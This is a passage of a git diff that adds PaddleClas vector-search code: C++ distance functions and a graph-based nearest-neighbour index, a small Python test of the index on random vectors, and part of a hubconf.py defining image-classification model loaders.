+ //printf("adding %zu\n",idx); + //for(auto p : value) + // printf("%zu %d %f\n",idx,p.first,p.second); + curr_num = std::max(curr_num,idx); + auto p = get(idx); + value_t lena = 0; + for(const auto& v : value){ + *(p + v.first) = v.second; + lena += v.second * v.second; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + for(const auto& v : value){ + *(p + v.first) = v.second / modifier_a; + } + } + + inline size_t max_vertices(){ + return num; + } + + inline size_t curr_vertices(){ + return curr_num; + } + + void print(){ + for(int i = 0;i < num && i < 10;++i) + printf("%f ",*(data.get() + i)); + printf("\n"); + } + + int get_dim(){ + return dim; + } + + void dump(std::string path = "bfsg.data"){ + FILE* fp = fopen(path.c_str(),"wb"); + fwrite(data.get(),sizeof(value_t) * num * dim,1,fp); + fclose(fp); + } + + void load(std::string path = "bfsg.data"){ + curr_num = num; + FILE* fp = fopen(path.c_str(),"rb"); + auto cnt = fread(data.get(),sizeof(value_t) * num * dim,1,fp); + fclose(fp); + } + +}; +template<> +dist_t Data::ipwrap_l2_build_distance(idx_t a,idx_t& b) const{ + auto pa = get(a); + auto pb = get(b); + dist_t ret = 0; + dist_t normu = 0; + dist_t normv = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - *(pb + i); + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + normv += (*(pb + i)) * (*(pb + i)); + } + dist_t wrap_termu = sqrt(1 - normu / max_ip_norm2); + dist_t wrap_termv = sqrt(1 - normv / max_ip_norm2); + dist_t diff_wrap = wrap_termu - wrap_termv; + ret = ret / max_ip_norm2 + diff_wrap * diff_wrap; + return ret; +} +template<> +dist_t Data::ipwrap_l2_query_distance(idx_t a,idx_t& b) const{ + auto pa = get(a); + auto pb = get(b); + dist_t ret = 0; + dist_t normu = 0; + for(int i = 0;i < dim;++i){ + auto diff = (*(pa + i) / max_ip_norm) - *(pb + i); + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + } + ret += 1 - normu / max_ip_norm2; + return ret; +} +template<> +dist_t Data::l2_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - *(pb + i); + ret += diff * diff; + } + return ret; +} + +template<> +dist_t Data::negative_inner_prod_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + ret -= (*(pa + i)) * (*(pb + i)); + } + return ret; +} + +template<> +dist_t Data::negative_cosine_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + ret += (*(pa + i)) * (*(pb + i)); + lena += (*(pa + i)) * (*(pa + i)); + lenv += (*(pb + i)) * (*(pb + i)); + } + int sign = ret < 0 ? 1 : -1; +// return sign * (ret * ret / lena); + return sign * (ret * ret / lena / lenv); +} + +template<> +dist_t Data::mobius_l2_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + lena += (*(pa + i)) * (*(pa + i)); + lenv += (*(pb + i)) * (*(pb + i)); + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + value_t modifier_v = pow(lenv,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + if(fabs(modifier_v) < ZERO_EPS) + modifier_v = 1; + for(int i = 0;i < dim;++i){ + value_t tmp = (*(pa + i)) / modifier_a - (*(pb + i)) / modifier_v; + ret += tmp * tmp; + } + return ret; +} + +#else +//sparse data +class Data{ +public: + //TODO + +}; +#endif + + diff --git a/Smart_container/PaddleClas/deploy/vector_search/src/graph.h b/Smart_container/PaddleClas/deploy/vector_search/src/graph.h new file mode 100644 index 0000000..d54353b --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/src/graph.h @@ -0,0 +1,636 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/graph.h + + +#pragma once +#include +#include +#include +#include +#include +#include +#include +#include + +#include"config.h" +#include"data.h" + +#ifdef OMP +#include +#endif + +typedef unsigned int vl_type; + +class VisitedList { +public: + vl_type curV; + vl_type *mass; + unsigned int numelements; + + VisitedList(int numelements1) { + curV = 1; + numelements = numelements1; + mass = new vl_type[numelements]; + memset(mass, 0, sizeof(vl_type) * numelements); + } + + void reset() { + ++curV; + if (curV == 0) { + curV = 1; + memset(mass, 0, sizeof(vl_type) * numelements); + } + }; + + ~VisitedList() { delete mass; } +}; + +struct GraphMeasures{ + int distance_cnt = 0; +}; + +class GraphWrapper{ +public: + virtual void add_vertex(idx_t vertex_id,std::vector>& point) = 0; + virtual void add_vertex_lock(idx_t vertex_id,std::vector>& point) = 0; + virtual void search_top_k(const std::vector>& query,int k,std::vector& result) = 0; + virtual void search_top_k_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){} + + virtual void dump(std::string path = "bfsg.graph") = 0; + virtual void load(std::string path = "bfsg.graph") = 0; + virtual ~GraphWrapper(){} + virtual void set_construct_pq_size(int size){}; + GraphMeasures measures; +}; + +template +class FixedDegreeGraph : public GraphWrapper{ +private: + const int degree = SEARCH_DEGREE; + const int flexible_degree = FIXED_DEGREE; + const int vertex_offset_shift = FIXED_DEGREE_SHIFT; + std::vector edges; + std::vector edge_dist; + Data* data; + std::mt19937_64 rand_gen = std::mt19937_64(1234567);//std::random_device{}()); + std::vector edge_mutex;//do not push back on this vector, it will destroy the mutex + + bool debug = false; + VisitedList* p_visited = NULL; + #ifdef OMP + std::vector visited_pool; + #endif + int construct_pq_size = CONSTRUCT_SEARCH_BUDGET; + + + void rank_and_switch_ordered(idx_t v_id,idx_t u_id){ + //We assume the neighbors of v_ids in edges[offset] are sorted + //by the distance to v_id ascendingly when it is full + //NOTICE: before it is full, it is unsorted + auto curr_dist = pair_distance(v_id,u_id); + auto offset = ((size_t)v_id) << vertex_offset_shift; + int degree = edges[offset]; + std::vector neighbor; + neighbor.reserve(degree + 1); + for(int i = 0;i < degree;++i) + neighbor.push_back(edges[offset + i + 1]); + neighbor.push_back(u_id); + neighbor = edge_selection_filter_neighbor(neighbor,v_id,flexible_degree); + edges[offset] = neighbor.size(); + for(int i = 0;i < neighbor.size();++i) + edges[offset + i + 1] = neighbor[i]; + return; + //We assert edges[offset] > 0 here + if(curr_dist >= edge_dist[offset + edges[offset]]){ + return; + } + edges[offset + edges[offset]] = u_id; + edge_dist[offset + edges[offset]] = curr_dist; + for(size_t i = offset + edges[offset] - 1;i > offset;--i){ + if(edge_dist[i] > edge_dist[i + 1]){ + std::swap(edges[i],edges[i + 1]); + std::swap(edge_dist[i],edge_dist[i + 1]); + }else{ + break; + } + } + } + + void rank_and_switch(idx_t v_id,idx_t u_id){ + rank_and_switch_ordered(v_id,u_id); + //TODO: + //Implement an unordered version to compare with + } + + template + dist_t distance(idx_t a,T& b){ + if(dist_type == 0) + return data->l2_distance(a,b); + else if(dist_type == 1) + return data->negative_inner_prod_distance(a,b); + else if(dist_type == 2) + return data->negative_cosine_distance(a,b); + else if(dist_type == 3) + return data->l2_distance(a,b); + else if(dist_type == 4) + return data->ipwrap_l2_build_distance(a,b); + else if(dist_type == 5) + return data->ipwrap_l2_query_distance(a,b); + else{ + // should not happen + fprintf(stderr,"unsupported dist_type %d\n",dist_type); + return 0; + } + } + + void compute_distance_naive(size_t offset,std::vector& dists){ + dists.resize(edges[offset]); + auto degree = edges[offset]; + for(int i = 0;i < degree;++i){ + dists[i] = distance(offset >> vertex_offset_shift,edges[offset + i + 1]); + } + } + + void compute_distance(size_t offset,std::vector& dists){ + compute_distance_naive(offset,dists); + } + + template + dist_t pair_distance_naive(idx_t a,T& b){ + ++measures.distance_cnt; + return distance(a,b); + } + + template + dist_t pair_distance(idx_t a,T& b){ + return pair_distance_naive(a,b); + } + + + void qsort(size_t l,size_t r){ + auto mid = (l + r) >> 1; + int i = l,j = r; + auto k = edge_dist[mid]; + do{ + while(edge_dist[i] < k) ++i; + while(k < edge_dist[j]) --j; + if(i <= j){ + std::swap(edge_dist[i],edge_dist[j]); + std::swap(edges[i],edges[j]); + ++i; + --j; + } + }while(i <= j); + if(i < r)qsort(i,r); + if(l < j)qsort(l,j); + } + + void rank_edges(size_t offset){ + std::vector dists; + compute_distance(offset,dists); + for(int i = 0;i < dists.size();++i) + edge_dist[offset + i + 1] = dists[i]; + qsort(offset + 1,offset + dists.size()); + //TODO: + //use a heap in the edge_dist + } + + void add_edge_lock(idx_t v_id,idx_t u_id){ + edge_mutex[v_id].lock(); + auto offset = ((size_t)v_id) << vertex_offset_shift; + if(edges[offset] < flexible_degree){ + ++edges[offset]; + edges[offset + edges[offset]] = u_id; + }else{ + rank_and_switch(v_id,u_id); + } + edge_mutex[v_id].unlock(); + } + + void add_edge(idx_t v_id,idx_t u_id){ + auto offset = ((size_t)v_id) << vertex_offset_shift; + if(edges[offset] < flexible_degree){ + ++edges[offset]; + edges[offset + edges[offset]] = u_id; + }else{ + rank_and_switch(v_id,u_id); + } + } + +public: + long long total_explore_cnt = 0; + int total_explore_times = 0; + + size_t search_start_point = 0; + bool ignore_startpoint = false; + + FixedDegreeGraph(Data* data) : data(data){ + auto num_vertices = data->max_vertices(); + edges = std::vector(((size_t)num_vertices) << vertex_offset_shift); + edge_dist = std::vector(((size_t)num_vertices) << vertex_offset_shift); + edge_mutex = std::vector(num_vertices); + p_visited = new VisitedList(num_vertices + 5); + #ifdef OMP + int n_threads = 1; + #pragma omp parallel + #pragma omp master + { + n_threads = omp_get_num_threads(); + } + visited_pool.resize(n_threads); + for(int i = 0;i < n_threads;++i) + visited_pool[i] = new VisitedList(num_vertices + 5); + #endif + } + + void set_construct_pq_size(int size){ + construct_pq_size = size; + } + + std::vector edge_selection_filter_neighbor(std::vector& neighbor,idx_t vertex_id,int desired_size){ + std::vector filtered_neighbor; + std::vector dists(neighbor.size()); + for(int i = 0;i < dists.size();++i) + dists[i] = pair_distance(vertex_id,neighbor[i]); + std::vector idx(neighbor.size()); + for(int i = 0;i < idx.size();++i) + idx[i] = i; + std::sort(idx.begin(),idx.end(),[&](int a,int b){return dists[a] < dists[b];}); + for(int i = 0;i < idx.size();++i){ + dist_t cur_dist = dists[idx[i]]; + bool pass = true; + for(auto neighbor_id : filtered_neighbor){ + if(cur_dist > pair_distance(neighbor_id,neighbor[idx[i]])){ + pass = false; + break; + } + } + if(pass){ + filtered_neighbor.push_back(neighbor[idx[i]]); + if(filtered_neighbor.size() >= desired_size) + break; + }else{ + } + } + return std::move(filtered_neighbor); + } + + void add_vertex_lock(idx_t vertex_id,std::vector>& point){ + std::vector neighbor; + search_top_k_lock(point,construct_pq_size,neighbor); + auto offset = ((size_t)vertex_id) << vertex_offset_shift; + int num_neighbors = degree < neighbor.size() ? degree : neighbor.size(); + edge_mutex[vertex_id].lock(); + // TODO: + // it is possible to save this space --- edges[offset] + // by set the last number in the range as + // a large number - current degree + if(neighbor.size() >= degree) + neighbor = edge_selection_filter_neighbor(neighbor,vertex_id,degree); + edges[offset] = neighbor.size(); + + for(int i = 0;i < neighbor.size() && i < degree;++i){ + edges[offset + i + 1] = neighbor[i]; + } + edge_mutex[vertex_id].unlock(); + for(int i = 0;i < neighbor.size() && i < degree;++i){ + add_edge_lock(neighbor[i],vertex_id); + } + } + void add_vertex(idx_t vertex_id,std::vector>& point){ + std::vector neighbor; + search_top_k(point,construct_pq_size,neighbor); + auto offset = ((size_t)vertex_id) << vertex_offset_shift; + int num_neighbors = degree < neighbor.size() ? degree : neighbor.size(); + // TODO: + // it is possible to save this space --- edges[offset] + // by set the last number in the range as + // a large number - current degree + if(neighbor.size() >= degree){ + neighbor = edge_selection_filter_neighbor(neighbor,vertex_id,degree); + } + edges[offset] = neighbor.size(); + + for(int i = 0;i < neighbor.size() && i < degree;++i){ + edges[offset + i + 1] = neighbor[i]; + } + for(int i = 0;i < neighbor.size() && i < degree;++i){ + add_edge(neighbor[i],vertex_id); + } + } + + void astar_multi_start_search_lock(const std::vector>& query,int k,std::vector& result){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? data->organize_point_mobius(query) : data->organize_point(query); + #ifdef OMP + int tid = omp_get_thread_num(); + auto& p_visited = visited_pool[tid]; + #endif + + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + edge_mutex[now.second].lock(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + edge_mutex[now.second].unlock(); + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + topk.pop(); + --i; + } + } + + void astar_no_heap_search(const std::vector>& query,std::vector& result){ + const int num_start_point = 1; + std::pair q_top = std::make_pair(10000000000,0); + auto converted_query = dist_type == 3 ? data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + p_visited->mass[start] = tag; + if(ignore_startpoint == false){ + q_top = (std::make_pair(pair_distance_naive(start,converted_query),start)); + }else{ + auto offset = ((size_t)start) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 1;i <= degree;++i){ + p_visited->mass[edges[offset + i]] = tag; + auto dis = pair_distance_naive(edges[offset + i],converted_query); + if(dis < q_top.first) + q_top = (std::make_pair(dis,start)); + } + } + } + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step;++iter){ + ++explore_cnt; + auto offset = ((size_t)q_top.second) << vertex_offset_shift; + auto degree = edges[offset]; + + bool changed = false; + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(dist < q_top.first){ + q_top = (std::make_pair(dist,start)); + changed = true; + } + } + if(changed == false) + break; + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(1); + result[0] = q_top.second; + } + + void astar_multi_start_search_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + score.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + score[i] = -(topk.top().first); + topk.pop(); + --i; + } + } + + void astar_multi_start_search(const std::vector>& query,int k,std::vector& result){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + topk.pop(); + --i; + } + } + + void search_top_k(const std::vector>& query,int k,std::vector& result){ + if(k == 1) + astar_no_heap_search(query,result); + else + astar_multi_start_search(query,k,result); + } + + void search_top_k_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){ + astar_multi_start_search_with_score(query,k,result,score); + } + + void search_top_k_lock(const std::vector>& query,int k,std::vector& result){ + astar_multi_start_search_lock(query,k,result); + } + + void print_stat(){ + auto n = data->max_vertices(); + size_t sum = 0; + std::vector histogram(2 * degree + 1,0); + for(size_t i = 0;i < n;++i){ + sum += edges[i << vertex_offset_shift]; + int tmp = edges[i << vertex_offset_shift]; + if(tmp > 2 * degree + 1) + fprintf(stderr,"[ERROR] node %zu has %d degree\n",i,tmp); + ++histogram[edges[i << vertex_offset_shift]]; + if(tmp != degree) + fprintf(stderr,"[INFO] %zu has degree %d\n",i,tmp); + } + fprintf(stderr,"[INFO] #vertices %zu, avg degree %f\n",n,sum * 1.0 / n); + std::unordered_set visited; + fprintf(stderr,"[INFO] degree histogram:\n"); + for(int i = 0;i <= 2 * degree + 1;++i) + fprintf(stderr,"[INFO] %d:\t%zu\n",i,histogram[i]); + + } + + void print_edges(int x){ + for(size_t i = 0;i < x;++i){ + size_t offset = i << vertex_offset_shift; + int degree = edges[offset]; + fprintf(stderr,"%d (%d): ",i,degree); + for(int j = 1;j <= degree;++j) + fprintf(stderr,"(%zu,%f) ",edges[offset + j],edge_dist[offset + j]); + fprintf(stderr,"\n"); + } + } + + void dump(std::string path = "bfsg.graph"){ + FILE* fp = fopen(path.c_str(),"wb"); + size_t num_vertices = data->max_vertices(); + fwrite(&edges[0],sizeof(edges[0]) * (num_vertices << vertex_offset_shift),1,fp); + fclose(fp); + } + + void load(std::string path = "bfsg.graph"){ + FILE* fp = fopen(path.c_str(),"rb"); + size_t num_vertices = data->max_vertices(); + auto cnt = fread(&edges[0],sizeof(edges[0]) * (num_vertices << vertex_offset_shift),1,fp); + fclose(fp); + } + + Data* get_data(){ + return data; + } + +}; + diff --git a/Smart_container/PaddleClas/deploy/vector_search/test.py b/Smart_container/PaddleClas/deploy/vector_search/test.py new file mode 100644 index 0000000..06951b4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/test.py @@ -0,0 +1,34 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import numpy as np +from interface import Graph_Index + +# 随机产生样本 +index_vectors = np.random.rand(100000,128).astype(np.float32) +query_vector = np.random.rand(128).astype(np.float32) +index_docs = ["ID_"+str(i) for i in range(100000)] + +# 初始化索引结构 +indexer = Graph_Index(dist_type="IP") #支持"IP"和"L2" +indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test') + +# 查询 +scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100) +print(scores) +print(docs) + +# 保存与加载 +indexer.dump(index_path="test") +indexer.load(index_path="test") diff --git a/Smart_container/PaddleClas/hubconf.py b/Smart_container/PaddleClas/hubconf.py new file mode 100644 index 0000000..b7f7674 --- /dev/null +++ b/Smart_container/PaddleClas/hubconf.py @@ -0,0 +1,788 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +dependencies = ['paddle'] + +import paddle +import os +import sys + + +class _SysPathG(object): + """ + _SysPathG used to add/clean path for sys.path. Making sure minimal pkgs dependents by skiping parent dirs. + + __enter__ + add path into sys.path + __exit__ + clean user's sys.path to avoid unexpect behaviors + """ + + def __init__(self, path): + self.path = path + + def __enter__(self, ): + sys.path.insert(0, self.path) + + def __exit__(self, type, value, traceback): + _p = sys.path.pop(0) + assert _p == self.path, 'Make sure sys.path cleaning {} correctly.'.format( + self.path) + + +with _SysPathG(os.path.dirname(os.path.abspath(__file__)), ): + import ppcls + import ppcls.arch.backbone as backbone + + def ppclas_init(): + if ppcls.utils.logger._logger is None: + ppcls.utils.logger.init_logger() + + ppclas_init() + + def _load_pretrained_parameters(model, name): + url = 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/{}_pretrained.pdparams'.format( + name) + path = paddle.utils.download.get_weights_path_from_url(url) + model.set_state_dict(paddle.load(path)) + return model + + def alexnet(pretrained=False, **kwargs): + """ + AlexNet + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `AlexNet` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.AlexNet(**kwargs) + + return model + + def vgg11(pretrained=False, **kwargs): + """ + VGG11 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG11` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG11(**kwargs) + + return model + + def vgg13(pretrained=False, **kwargs): + """ + VGG13 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG13` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG13(**kwargs) + + return model + + def vgg16(pretrained=False, **kwargs): + """ + VGG16 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG16` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG16(**kwargs) + + return model + + def vgg19(pretrained=False, **kwargs): + """ + VGG19 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG19` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG19(**kwargs) + + return model + + def resnet18(pretrained=False, **kwargs): + """ + ResNet18 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet18` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet18(**kwargs) + + return model + + def resnet34(pretrained=False, **kwargs): + """ + ResNet34 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet34` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet34(**kwargs) + + return model + + def resnet50(pretrained=False, **kwargs): + """ + ResNet50 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet50` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet50(**kwargs) + + return model + + def resnet101(pretrained=False, **kwargs): + """ + ResNet101 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet101` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet101(**kwargs) + + return model + + def resnet152(pretrained=False, **kwargs): + """ + ResNet152 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet152` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet152(**kwargs) + + return model + + def squeezenet1_0(pretrained=False, **kwargs): + """ + SqueezeNet1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `SqueezeNet1_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.SqueezeNet1_0(**kwargs) + + return model + + def squeezenet1_1(pretrained=False, **kwargs): + """ + SqueezeNet1_1 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `SqueezeNet1_1` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.SqueezeNet1_1(**kwargs) + + return model + + def densenet121(pretrained=False, **kwargs): + """ + DenseNet121 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet121` model depends on 